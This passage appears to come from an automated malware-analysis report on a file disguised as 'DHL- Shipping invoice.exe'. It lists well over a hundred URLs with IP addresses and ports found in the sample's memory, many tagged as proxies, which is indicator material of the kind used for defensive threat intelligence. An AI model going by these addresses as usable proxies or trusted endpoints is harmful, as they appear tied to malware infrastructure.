                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.231
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.231://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.231:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.81
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.81://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.81:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.212.190.241:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.212.190.241:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9821F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.246.226
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.246.226://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.246.226:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.250.56.129:9898
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.250.56.129:9898://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98154F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.58.158:34018
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98155B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.58.158:34018://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:10647
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:10647://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983300000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:22450
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:22450://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23859://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:45134
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:45134://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.13.3:50887
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.13.3:50887://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.133.214:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.133.214:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.139.15:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.139.15:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.16.96:46919
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.16.96:46919://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.209.188:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.209.188:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.21.216:57679
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.21.216:57679://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.211.81:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.211.81:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.12:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.12:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.234.222:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.234.222:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.242.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.242.202:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.242.202:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814D8000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.254.129:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.254.129:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.64.130:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.64.130:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.68:8811
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.68:8811://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.78.200:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.78.200:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982283000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9820F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.197:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9820F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.197:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.211:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.211:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.163.198:88
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.163.198:88://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.221.176:63003
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.221.176:63003://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.221.176:8635
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.221.176:8635://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:58612
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:58612://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:26567
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:26567://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:29360
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:29360://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:63404
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:63404://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:27206
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:27206://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:40351
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:44029
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:44029://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:46286
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:46286://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:49559
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:49559://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.X
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.13.88
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.13.88://proxy
